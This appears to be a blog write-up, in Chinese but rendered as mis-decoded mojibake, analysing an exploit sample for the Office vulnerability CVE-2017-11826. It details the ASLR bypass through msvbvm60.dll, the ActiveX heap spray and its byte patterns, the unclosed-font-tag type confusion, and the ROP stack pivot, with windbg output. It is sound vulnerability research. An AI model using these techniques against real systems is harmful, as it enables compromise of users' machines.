I"ª{<h1 id="å‰è¨€">å‰è¨€</h1>

<p>æœ€è¿‘å¼€å§‹åˆ†æOfficeæ¼æ´ï¼Œæ‹¿åˆ°CVE-2017-11826çš„æ ·æœ¬åå‘ç°æ— æ³•åœ¨Office2010ä¸ŠæˆåŠŸæ‰§è¡Œï¼Œæ‰“ç®—åˆ†æå¹¶æ”¹é€ è¯¥EXPã€‚å‚è€ƒäº†è®¸å¤šèµ„æ–™ï¼Œç»“åˆè‡ªå·±çš„ç†è§£å†™äº†æœ¬æ–‡ï¼Œä¾›å¤§å®¶å­¦ä¹ å’Œå‚è€ƒã€‚<!--more--></p>

<h1 id="æ¼æ´åˆ†æ">æ¼æ´åˆ†æ</h1>

<h2 id="åˆ†æç¯å¢ƒ">åˆ†æç¯å¢ƒ</h2>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>OS:			Win7 x64 SP1
Office:		    	Ofiice 2010 x86
Image name: 		wwlib.dll
Timestamp:      	Sat Mar 27 23:37:07 2010 (4BAE2623)
CheckSum:       	0127F568
ImageSize:      	0127A000
File version:   	14.0.4762.1000
Product version:	14.0.4762.0
</code></pre></div></div>

<h2 id="é™æ€åˆ†æ">é™æ€åˆ†æ</h2>

<p>åœ¨rtfæ–‡æ¡£ä¸­æœç´¢objectï¼Œå‘ç°åµŒå…¥äº†3ä¸ªoleå¯¹è±¡ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210727171412503.png" alt="image-20210727171412503" /></p>

<p>ç¬¬ä¸€ä¸ªå¯¹è±¡çš„CLSIDä¸º<code class="language-plaintext highlighter-rouge">D5DE8D20-5BB8-11D1-A1E3-00A0C90F2731</code>ï¼Œåœ¨æ³¨å†Œè¡¨æœç´¢åå‘ç°è¯¥å¯¹è±¡ä½äº<code class="language-plaintext highlighter-rouge">C:\Windows\SysWOW64\msvbvm60.dll</code>ï¼Œè€Œè¯¥dllæ˜¯æ²¡æœ‰ASLRçš„ã€‚</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210727175112215.png" alt="image-20210727175112215" /></p>

<p>é€šè¿‡ProcessExplorerå‘ç°wordæ‰“å¼€rtfæ–‡æ¡£åç¡®å®åŠ è½½äº†msvbvm60.dllï¼Œä¸”è¯¥dllæ— ASLRï¼Œè¯´æ˜è¯¥oleå¯¹è±¡çš„ä½œç”¨æ˜¯ç»•è¿‡ASLRã€‚</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210727180558328.png" alt="image-20210727180558328" /></p>

<p>ä½¿ç”¨<code class="language-plaintext highlighter-rouge">rtfobj.py -s all</code>æå–oleå¯¹è±¡ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210727165632756.png" alt="image-20210727165632756" /></p>

<p>ç¬¬ä¸€ä¸ªå¯¹è±¡ç»è¿‡ä¸Šé¢çš„åˆ†ææ˜¯ç”¨äºç»•è¿‡ASLRçš„ï¼Œç¬¬äºŒå’Œç¬¬ä¸‰ä¸ªéƒ½æ˜¯.docæ–‡æ¡£ï¼Œä½¿ç”¨å‹ç¼©è½¯ä»¶ç›´æ¥æ‰“å¼€ç¬¬äºŒä¸ªæ–‡æ¡£ï¼Œæ–‡æ¡£ç»“æ„å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>â”‚  [Content_Types].xml
â”‚  
â”œâ”€docProps
â”‚      app.xml
â”‚      core.xml
â”‚      
â”œâ”€word
â”‚  â”‚  document.xml
â”‚  â”‚  fontTable.xml
â”‚  â”‚  settings.xml
â”‚  â”‚  styles.xml
â”‚  â”‚  webSettings.xml
â”‚  â”‚  
â”‚  â”œâ”€activeX
â”‚  â”‚  â”‚  activeX1.bin
â”‚  â”‚  â”‚  activeX1.xml
â”‚  â”‚  â”‚  activeX2.xml
â”‚  â”‚  â”‚  	Â·Â·Â·Â·Â·Â·
â”‚  â”‚  â”‚  activeX40.xml
â”‚  â”‚  â”‚  
â”‚  â”‚  â””â”€_rels
â”‚  â”‚          activeX1.xml.rels
â”‚  â”‚          activeX2.xml.rels
â”‚  â”‚          		Â·Â·Â·Â·Â·Â·
â”‚  â”‚          activeX40.xml.rels
â”‚  â”‚          
â”‚  â”œâ”€media
â”‚  â”‚      image1.wmf
â”‚  â”‚      
â”‚  â”œâ”€theme
â”‚  â”‚      theme1.xml
â”‚  â”‚      
â”‚  â””â”€_rels
â”‚          document.xml.rels
â”‚          
â””â”€_rels
        .rels
</code></pre></div></div>

<p>å¯ä»¥çœ‹å‡ºä½¿ç”¨äº†40ä¸ªactiveX.xmlæ–‡ä»¶ï¼Œæ–‡ä»¶å†…å®¹å¦‚ä¸‹ï¼š</p>

<div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?xml version="1.0" encoding="UTF-8" standalone="no"?&gt;</span>
<span class="nt">&lt;ax:ocx</span> <span class="na">ax:classid=</span><span class="s">"{00000000-0000-0000-0000-000000000001}"</span> <span class="na">ax:persistence=</span><span class="s">"persistStorage"</span> <span class="na">r:id=</span><span class="s">"rId1"</span> <span class="na">xmlns:ax=</span><span class="s">"http://schemas.microsoft.com/office/2006/activeX"</span> <span class="na">xmlns:r=</span><span class="s">"http://schemas.openxmlformats.org/officeDocument/2006/relationships"</span><span class="nt">/&gt;</span>
</code></pre></div></div>

<p>40ä¸ªxmlæ–‡ä»¶å†…å®¹ä¸€è‡´ï¼ŒåŠ è½½äº†CLSIDä¸º{00000000-0000-0000-0000-000000000001}çš„å¯¹è±¡ï¼Œç„¶è€Œç³»ç»Ÿä¸­å¹¶æ²¡æœ‰è¿™ä¸ªå¯¹è±¡ï¼Œæ‰€ä»¥å¹¶ä¸ä¼šåŠ è½½ä»»ä½•å¯¹è±¡ï¼Œè¿™ä¹ˆåšæ˜¯ä¸ºäº†æé«˜å †å–·çš„æ•ˆç‡ï¼Œå…·ä½“åŸç†å¯æŸ¥çœ‹<a href="https://www.greyhathacker.net/?p=911">SPRAYING THE HEAP IN SECONDS USING ACTIVEX CONTROLS IN MICROSOFT OFFICE</a>ä¸€æ–‡ã€‚</p>

<p>è€Œ40ä¸ªactiveX.xml.relsçš„å†…å®¹ä¹Ÿå®Œå…¨ä¸€è‡´ï¼š</p>

<div class="language-xml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;</span>
<span class="nt">&lt;Relationships</span> <span class="na">xmlns=</span><span class="s">"http://schemas.openxmlformats.org/package/2006/relationships"</span><span class="nt">&gt;</span>
	<span class="nt">&lt;Relationship</span> <span class="na">Id=</span><span class="s">"rId1"</span> <span class="na">Type=</span><span class="s">"http://schemas.microsoft.com/office/2006/relationships/activeXControlBinary"</span> <span class="na">Target=</span><span class="s">"activeX1.bin"</span><span class="nt">/&gt;</span>
<span class="nt">&lt;/Relationships&gt;</span>
</code></pre></div></div>

<p>éƒ½æŒ‡å‘äº†activeX1.binæ–‡ä»¶ï¼Œå› æ­¤ä¼šå°†activeX1.binåœ¨å†…å­˜ä¸­åŠ è½½40æ¬¡ï¼Œä»¥æ­¤è¾¾åˆ°å †å–·çš„ç›®çš„ã€‚</p>

<p>activeX1.binæ–‡ä»¶ç»“æ„å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>activeX1.bin
â”‚ -æ–‡ä»¶å¤´ 
â”‚ -æ•°æ®
â”‚    â”‚---CB 40 94 72 EC 83 88 08 CB 40 94 72 EC 83 88 08
â”‚    â”‚						Â·Â·Â·Â·Â·Â·
â”‚    â”‚---CB 40 94 72 EC 83 88 08 CB 40 94 72 EC 83 88 08
â”‚    â”‚---shellcode Â·Â·Â·Â·Â·Â·
â”‚    â”‚---2B 0E 98 72 2B 0E 98 72 2B 0E 98 72 2B 0E 98 72
â”‚    â”‚						Â·Â·Â·Â·Â·Â·
â”‚    â”‚---2B 0E 98 72 2B 0E 98 72 2B 0E 98 72 2B 0E 98 72
â”‚    â”‚						Â·Â·Â·Â·Â·Â·
â”‚    â”‚---CB 40 94 72 EC 83 88 08 CB 40 94 72 EC 83 88 08
â”‚    â”‚						Â·Â·Â·Â·Â·Â·

</code></pre></div></div>

<p>çœ‹ç»“æ„ä¼¼ä¹æ˜¯æ»‘æ¿æŒ‡ä»¤åŠ shellcodeï¼Œå¾…è°ƒè¯•éªŒè¯ã€‚</p>

<p>ç¬¬ä¸‰ä¸ªæ–‡æ¡£ç»“æ„å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>â”‚  [Content_Types].xml
â”‚  
â”œâ”€docProps
â”‚      app.xml
â”‚      core.xml
â”‚      
â”œâ”€word
â”‚  â”‚  document.xml
â”‚  â”‚  endnotes.xml
â”‚  â”‚  fontTable.xml
â”‚  â”‚  footnotes.xml
â”‚  â”‚  settings.xml
â”‚  â”‚  styles.xml
â”‚  â”‚  webSettings.xml
â”‚  â”‚  
â”‚  â”œâ”€theme
â”‚  â”‚      theme1.xml
â”‚  â”‚      
â”‚  â””â”€_rels
â”‚          document.xml.rels
â”‚          
â””â”€_rels
        .rels
</code></pre></div></div>

<p>document.xmlçš„å†…å®¹å¦‚ä¸‹ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210804144955166.png" alt="image-20210804144955166" /></p>

<p>è§‚æµ‹åˆ°&lt;w:font æ ‡ç­¾å†…æœ‰å¼‚å¸¸å­—ç¬¦ï¼Œä¸”æ ‡ç­¾æœªæ­£å¸¸é—­åˆï¼Œé¢„æµ‹æ¼æ´è§¦å‘äºè¯¥å¤„ã€‚</p>

<p>é€šè¿‡é™æ€åˆ†æäº†è§£åˆ°RTFæ–‡æ¡£é€šè¿‡å†…åµŒ3ä¸ªoleå¯¹è±¡æ¥å®ç°ASLRç»•è¿‡ã€å †å–·å°„å’Œæ¼æ´è§¦å‘ï¼ŒASLRç»•è¿‡æ˜¯é€šè¿‡åŠ è½½CLSIDä¸º<code class="language-plaintext highlighter-rouge">D5DE8D20-5BB8-11D1-A1E3-00A0C90F2731</code>çš„COMå¯¹è±¡ï¼Œå°†<code class="language-plaintext highlighter-rouge">msvbvm60.dll</code>åŠ è½½åˆ°å†…å­˜ä¸­ã€‚å †å–·å°„åˆ©ç”¨40ä¸ªactiveX.xml.relsæŒ‡å‘å”¯ä¸€çš„activeX1.binæ–‡ä»¶ï¼Œå°†activeX1.binæ–‡ä»¶ä¸­çš„æ•°æ®éƒ¨åˆ†ï¼Œå³åç§»ä¸º0x800åçš„å†…å®¹åŠ è½½åˆ°å†…å­˜ä¸­å®ç°å †å–·å°„ã€‚è€Œæ¼æ´è§¦å‘éƒ¨åˆ†åˆ™åˆ©ç”¨document.xmlä¸­çš„å¼‚å¸¸å­—ç¬¦å’Œæ ‡ç­¾è§¦å‘æ¼æ´ã€‚</p>

<h3 id="åŠ¨æ€è°ƒè¯•">åŠ¨æ€è°ƒè¯•</h3>

<p>ä½¿ç”¨windbgé™„åŠ wordï¼Œæ‰“å¼€æ¼æ´æ–‡ä»¶ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210727162527153.png" alt="image-20210727162527153" /></p>

<p>å¯ä»¥çœ‹åˆ°å¼‚å¸¸å› ä¸ºecx+4æŒ‡å‘çš„å†…å­˜æ— æ³•è®¿é—®å¯¼è‡´é”™è¯¯ã€‚æŸ¥çœ‹åæ±‡ç¼–å¾—çŸ¥ecxçš„å€¼æ¥æºäºeaxï¼Œæ­¤æ—¶eaxçš„å€¼ä¸º<code class="language-plaintext highlighter-rouge">088888ec</code>ã€‚å†æ¬¡æ‰“å¼€æ¼æ´æ–‡ä»¶å‘ç°ecxçš„å€¼æ”¹å˜ï¼Œä½†æ˜¯eaxçš„å€¼ä»ä¸º<code class="language-plaintext highlighter-rouge">088888ec</code>ï¼Œè¯´æ˜eaxçš„å€¼ä¸ºæ•…æ„æ„é€ ã€‚</p>

<p>äºæ˜¯æ‰“ç®—ä¸‹æ–­åœ¨å‡½æ•°<code class="language-plaintext highlighter-rouge">wwlib!DllGetClassObject+0x42d4 (71ed98b0)</code>æŸ¥çœ‹eaxæ˜¯å¦‚ä½•ç”Ÿæˆçš„ã€‚æŸ¥çœ‹wwlibçš„åŸºåœ°å€ï¼Œç®—å‡ºå‡½æ•°çš„åç§»ä¸º<code class="language-plaintext highlighter-rouge">wwlib+004da16b</code>ã€‚</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0:000&gt; lm m wwlib
start    end        module name
71ed0000 7314a000   wwlib      (export symbols)       C:\PROGRA~2\MICROS~1\Office14\wwlib.dll
0:000&gt; ? 723aa16b-71ed0000
Evaluate expression: 5087595 = 004da16b
</code></pre></div></div>

<p>é‡æ–°æ‰“å¼€æ¼æ´æ–‡æ¡£ï¼Œ<code class="language-plaintext highlighter-rouge">bp wwlib+004da16b</code>ä¸‹æ–­ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210802112402518.png" alt="image-20210802112402518" /></p>

<p>æ­¥è¿‡ä¸¤æ¬¡åæ‰§è¡Œåˆ°å¦‚å›¾æ‰€ç¤ºä½ç½®æ—¶ï¼ŒæŸ¥çœ‹eaxæ‰€åœ¨çš„å†…å­˜ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210802112612050.png" alt="image-20210802112612050" /></p>

<p>å‘ç°å’Œåœ¨æ–‡æ¡£3ä¸­çš„å­—ç¬¦ä¸²ä¸€è‡´ï¼Œæ¥ç€æŸ¥çœ‹eax+44ï¼Œå¯¹åº”çš„æ­£æ˜¯å¼‚å¸¸è§¦å‘æ—¶eaxçš„å€¼<code class="language-plaintext highlighter-rouge">088888ec</code>ã€‚</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210802112936829.png" alt="image-20210802112936829" /></p>

<p>ä½†åœ¨xmlæ–‡ä»¶ä¸­ï¼Œå­—ç¬¦ä¸²ä¸­çš„å¼‚å¸¸å­—ç¬¦çš„åå…­è¿›åˆ¶ä¸º<code class="language-plaintext highlighter-rouge">e8a3ace0a288</code>ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210802140720647.png" alt="image-20210802140720647" /></p>

<p>åœ¨æ–‡ä»¶ä¸­æ˜¾ç¤ºçš„æ ¼å¼æ˜¯Asciiï¼Œç„¶è€Œåœ¨å†…å­˜ä¸­æ˜¾ç¤ºçš„æ˜¯Unicodeï¼Œäºæ˜¯å°†æ–‡ä»¶ä¸­çš„å­—ç¬¦ä»¥utf-8æ ¼å¼è½¬æ¢ä¸ºåå…­è¿›åˆ¶æ­£æ˜¯eaxçš„å€¼<code class="language-plaintext highlighter-rouge">088888ec</code>ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210802142105409.png" alt="image-20210802142105409" /></p>

<p>è¯´æ˜é€šè¿‡ä¿®æ”¹è¯¥å­—ç¬¦ä¸²å¯ä»¥æ§åˆ¶eaxçš„å€¼ï¼Œè¿›è€Œæ§åˆ¶eipã€‚</p>

<p>åœ¨idaä¸­æ‰¾åˆ°å¥”æºƒå‡½æ•°ä¸ºsub_31A55CE6ï¼Œå‘ç°å˜é‡v3æ˜¯å®½å­—èŠ‚å­—ç¬¦ä¸²ï¼Œä½äºarg2+0x18ï¼Œå˜é‡v4æ˜¯ä¸€ä¸ªé•¿åº¦ï¼Œä½äºarg2+0x1c</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210802153650508.png" alt="image-20210802153650508" /></p>

<p>åœ¨windbgè®¾ç½®å´©æºƒå‡½æ•°èµ·å§‹ç‚¹æ‰“å°v3ä¸ºå­—ç¬¦ä¸²ï¼Œé•¿åº¦ä¸ºv4ï¼š<code class="language-plaintext highlighter-rouge">bp wwlib+385ce6 "du poi(poi(esp+8)+18) Lpoi(poi(esp+8)+1c); g;"</code></p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210802161250939.png" alt="image-20210802161250939" /></p>

<p>å¯ä»¥çœ‹åˆ°v3å°±æ˜¯xmlæ–‡ä»¶ä¸­çš„æ ‡ç­¾ï¼Œåœ¨è§£æåˆ°idmpæ ‡ç­¾åç¨‹åºå´©æºƒï¼Œç„¶è€Œå¹¶æ²¡æœ‰çœ‹åˆ°fontæ ‡ç­¾ï¼Œäºæ˜¯å¯»æ‰¾åˆ°å´©æºƒå‡½æ•°çš„çˆ¶å‡½æ•°sub_3170FA5A</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210802163044663.png" alt="image-20210802163044663" /></p>

<p>å´©æºƒå‡½æ•°arg2çš„å€¼ä¸ºediï¼Œè€Œediçš„å€¼ä¸ºçˆ¶å‡½æ•°çš„arg2ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210802165001758.png" alt="image-20210802165001758" /></p>

<p>äºæ˜¯åœ¨çˆ¶å‡½æ•°å’Œå´©æºƒå‡½æ•°åŒæ—¶ä¸‹æ–­ï¼ŒæŸ¥çœ‹æ ‡ç­¾è§£ææƒ…å†µï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bp wwlib+3fa5a ".printf \"Parent_Func:	\"; du poi(poi(esp+8)+18) Lpoi(poi(esp+8)+1c); g;"
bp wwlib+385ce6 ".printf \"Crash_Func:	\"; du poi(poi(esp+8)+18) Lpoi(poi(esp+8)+1c); g;"
</code></pre></div></div>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210802170632918.png" alt="image-20210802170632918" /></p>

<p>åœ¨çˆ¶å‡½æ•°æˆåŠŸè§£æåˆ°fontæ ‡ç­¾ï¼ŒçŒœæµ‹å› ä¸ºfontæ ‡ç­¾æœªé—­åˆè€Œå¯¼è‡´å´©æºƒå‡½æ•°è§£ææ ‡ç­¾å‡ºé”™äº§ç”Ÿæ¼æ´ï¼Œä¿®æ”¹äº†xmlæ–‡ä»¶é—­åˆäº†fontæ ‡ç­¾ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210804145041151.png" alt="image-20210804145041151" /></p>

<p>å°†ä¿®æ”¹åçš„docxæ–‡ä»¶åµŒå…¥åˆ°æ–°å»ºçš„rtfæ–‡ä»¶ä¸­ï¼Œåœ¨windbgä¸­è°ƒè¯•åå‘ç°eaxçš„å€¼æ”¹å˜äº†ï¼Œå¹¶ä¸”æ²¡æœ‰å¼‚å¸¸ï¼Œè¯å®å› ä¸ºfontæ ‡ç­¾æœªé—­åˆå¯¼è‡´çš„æ¼æ´ã€‚</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210802180616278.png" alt="image-20210802180616278" /></p>

<p>ç»§ç»­è°ƒè¯•å‘ç°å¼‚å¸¸è§¦å‘ç‚¹çš„eaxå’Œecxéƒ½æ˜¯æ¥è‡ªäºesiï¼Œè€Œesiä¸ºæ¼æ´å‡½æ•°çš„arg1ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210803145832128.png" alt="image-20210803145832128" /></p>

<p>å› æ­¤åœ¨æ¼æ´å‡½æ•°æ‰“å°æ ‡ç­¾ä»¥åŠ[[esi+17f0]]ã€[[esi+17f0]+8]ã€[[esi+17f0]+c]å’Œ[esi+17f0]çš„å€¼ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>bp wwlib+385ce6 "du poi(poi(esp+8)+18) Lpoi(poi(esp+8)+1c); r $t0=poi(poi(esp+4)+17f0); dd poi($t0) L1; dd poi($t0)+8 L1; dd poi($t0)+c L1; dd $t0 L1; .printf\"\\n\"; g;"
</code></pre></div></div>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210803162436403.png" alt="image-20210803162436403" /></p>

<p>æ‰“å°å‡ºçš„ç»“æ„å°±æ˜¯Taglistç»“æ„ä½“ï¼Œå…·ä½“ç»“æ„å‚è€ƒgoabout2çš„<a href="https://www.cnblogs.com/goabout2/p/8186018.html">office CVE-2017-11826æ‚è°ˆ</a>ä¸€æ–‡ã€‚</p>

<p>æ¥ç€è°ƒè¯•å¼‚å¸¸è§¦å‘ç‚¹ä¸Šçš„å‡½æ•°ï¼Œå‘ç°å‡½æ•°åŠŸèƒ½ä¸ºé€šè¿‡å±‚çº§æ ‡ç­¾è·å–TagObject Array[Index-2]ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210803192637477.png" alt="image-20210803192637477" /></p>

<p>ç»§ç»­å‘ä¸Šè¿½æº¯ï¼Œå‘ç°å‡½æ•°GetTagObjectä¹Ÿè°ƒç”¨äº†GetTagObjectByIndexï¼Œé€šè¿‡åˆ†æå‘ç°è¯¥å‡½æ•°è·å–çš„æ˜¯TagObject Array[Index-1]çš„åœ°å€ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210803193709068.png" alt="image-20210803193709068" /></p>

<p>åˆ†æåˆ°è¿™é‡Œï¼Œæ¼æ´äº§ç”Ÿçš„åŸå› ä¹Ÿå°±å‡ºæ¥äº†ï¼Œç”±äºwordæ¯è§£æä¸€ä¸ªæ ‡ç­¾ï¼ŒCurrent_Indexçš„å€¼å°±åŠ ä¸€ï¼Œå½“è§£æåˆ°é—­åˆæ ‡ç­¾ï¼ŒCurrent_Indexå€¼ä¼šå‡1ã€‚ç”±äºæ„é€ äº†æ²¡æœ‰é—­åˆçš„fontæ ‡ç­¾ï¼Œå› æ­¤å¯¼è‡´åœ¨è§£æidmapæ ‡ç­¾æ—¶æ¯”æ­£å¸¸æ–‡ä»¶çš„Current_Indexå¤šä¸€ï¼Œå¯¼è‡´åŸæœ¬åº”è¯¥è·å–OLEObjectæ ‡ç­¾çš„TagObjectå˜æˆè·å–äº†fontçš„TagObjectï¼Œå› æ­¤é€ æˆäº†æ ‡ç­¾ç±»å‹æ··æ·†å¯¼è‡´æ¼æ´çš„å‘ç”Ÿã€‚</p>

<p>å°†æ ‡ç­¾å±‚çº§å’Œxmlæ–‡ä»¶æ ‡ç­¾å¯¹åº”ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210803164645125.png" alt="image-20210803164645125" /></p>

<p>å¯ä»¥è¯å®ç¡®å®å› ä¸ºCurrent_Indexå€¼æ¯”æ­£å¸¸æ–‡ä»¶çš„å¤šä¸€å¯¼è‡´çš„ç±»å‹æ··æ·†ã€‚</p>

<p>åœ¨å†…å­˜ä¸­æŸ¥çœ‹å½“è§£æidmapå±‚çº§ä¸º6æ—¶Taglistçš„å†…å­˜ç»“æ„ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&gt; bp wwlib+4da16b
&gt; g
Breakpoint 1 hit
eax=070f1800 ebx=00000000 ecx=0225466c edx=00000004 esi=0225466c edi=070f19dc
eip=6f95a16b esp=002cf428 ebp=002cf490 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
wwlib!DllGetLCID+0x2cc775:
6f95a16b e840f7b2ff      call    wwlib!DllGetClassObject+0x42d4 (6f4898b0)
&gt; ub $ip L8
wwlib!DllGetLCID+0x2cc75d:
6f95a153 83780401        cmp     dword ptr [eax+4],1
6f95a157 0f85f5bdeaff    jne     wwlib!DllGetLCID+0x17855c (6f805f52)
6f95a15d 8bb6f0170000    mov     esi,dword ptr [esi+17F0h]
6f95a163 8b06            mov     eax,dword ptr [esi]
6f95a165 8b10            mov     edx,dword ptr [eax]
6f95a167 4a              dec     edx
6f95a168 4a              dec     edx
6f95a169 8bce            mov     ecx,esi
</code></pre></div></div>

<p>æ­¤æ—¶eaxçš„å€¼å³ä¸ºTaglistï¼Œå› æ­¤æŸ¥çœ‹eaxæŒ‡å‘çš„Taglistç»“æ„ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210803215207578.png" alt="image-20210803215207578" /></p>

<p>æ­¤æ—¶TagObject[4]+0x44çš„å€¼ä¸º<code class="language-plaintext highlighter-rouge">0x090b4000</code>ï¼ŒæŸ¥çœ‹è¯¥å€¼åœ¨å†…å­˜ä¸­å­˜å‚¨çš„æ•°æ®ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210803213913808.png" alt="image-20210803213913808" /></p>

<p>å‘ç°[[TagObject[4]+0x44]+0x44]çš„å€¼æ­£æ˜¯xmlæ–‡ä»¶ä¸­fontæ ‡ç­¾æ„é€ çš„å›ºå®šåœ°å€ï¼Œè‡ªæ­¤æ¼æ´éƒ¨åˆ†åˆ†æå®Œæ¯•ã€‚</p>

<h2 id="æ¼æ´åˆ©ç”¨">æ¼æ´åˆ©ç”¨</h2>

<p>å…ˆå¯åŠ¨wordç„¶åä½¿ç”¨windbgé™„åŠ ä¼šå¯¼è‡´å †å–·æ— æ³•æˆåŠŸï¼Œç»§è€Œæ— æ³•åˆ†ææ¼æ´åˆ©ç”¨éƒ¨åˆ†ã€‚å› æ­¤ä½¿ç”¨gflags.exeè®©è°ƒè¯•å™¨ç›´æ¥åŠ è½½winword.exeï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210803220115994.png" alt="image-20210803220115994" /></p>

<p>è®¾ç½®æ–­ç‚¹åœ¨å¼‚å¸¸è§¦å‘ç‚¹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&gt; bp wwlib+4da184
&gt; g
Breakpoint 0 hit
eax=088888ec ebx=00000000 ecx=088883ec edx=00000004 esi=004b44b4 edi=0340cddc
eip=6e2da184 esp=002f5f14 ebp=002f5f7c iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
wwlib!DllGetLCID+0x2cc78e:
6e2da184 50              push    eax
0:000&gt; u $ip
wwlib!DllGetLCID+0x2cc78e:
6e2da184 50              push    eax
6e2da185 ff5104          call    dword ptr [ecx+4]
6e2da188 e9fabdeaff      jmp     wwlib!DllGetLCID+0x178591 (6e185f87)
6e2da18d 83f802          cmp     eax,2
6e2da190 750f            jne     wwlib!DllGetLCID+0x2cc7ab (6e2da1a1)
6e2da192 83c624          add     esi,24h
6e2da195 56              push    esi
6e2da196 52              push    edx
&gt; dd ecx+4
088883f0  72980e2b 72980e2b 72980e2b 72980e2b
08888400  72980e2b 72980e2b 72980e2b 72980e2b
08888410  72980e2b 72980e2b 72980e2b 72980e2b
08888420  72980e2b 72980e2b 72980e2b 72980e2b
08888430  72980e2b 72980e2b 72980e2b 72980e2b
08888440  72980e2b 72980e2b 72980e2b 72980e2b
08888450  72980e2b 72980e2b 72980e2b 72980e2b
08888460  72980e2b 72980e2b 72980e2b 72980e2b
</code></pre></div></div>

<p>å‘ç°exc+4çš„å€¼ä¸ºactiveX1.binä¸­shellcodeä¸‹æ–¹çš„å¡«å……ï¼Œè¯´æ˜å·²ç»æˆåŠŸå †å–·ã€‚</p>

<p>æ­¥å…¥[exc+4]åå‘ç°æ¥åˆ°äº†msvbvm60.dllï¼Œå·²ç»è¿›å…¥äº†ROPé“¾ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&gt; t
eax=088888ec ebx=00000000 ecx=088883ec edx=00000004 esi=004c44b4 edi=0043cddc
eip=72980e2b esp=00385a18 ebp=00385a88 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
msvbvm60!IID_IVbaHost+0x127eb:
72980e2b 94              xchg    eax,esp
</code></pre></div></div>

<p>è€Œç¬¬ä¸€æ¡æŒ‡ä»¤åˆ™æ˜¯ç”¨æ¥æ ˆè¿ç§»ï¼Œåœ¨ä¹‹å‰å·²ç»å°†eaxå…¥æ ˆï¼Œè€Œeaxçš„å€¼æ­£æ˜¯æ„é€ å¥½çš„<code class="language-plaintext highlighter-rouge">0x088888ec</code>ï¼Œæ‰§è¡ŒæŒ‡ä»¤åï¼Œespçš„å€¼å·²ç»å˜æˆäº†<code class="language-plaintext highlighter-rouge">0x088888ec</code>ï¼š</p>

<p><img src="https://raw.githubusercontent.com/JoeyZzZzZz/JoeyZzZzZz.github.io/main/image/image-20210803223544350.png" alt="image-20210803223544350" /></p>

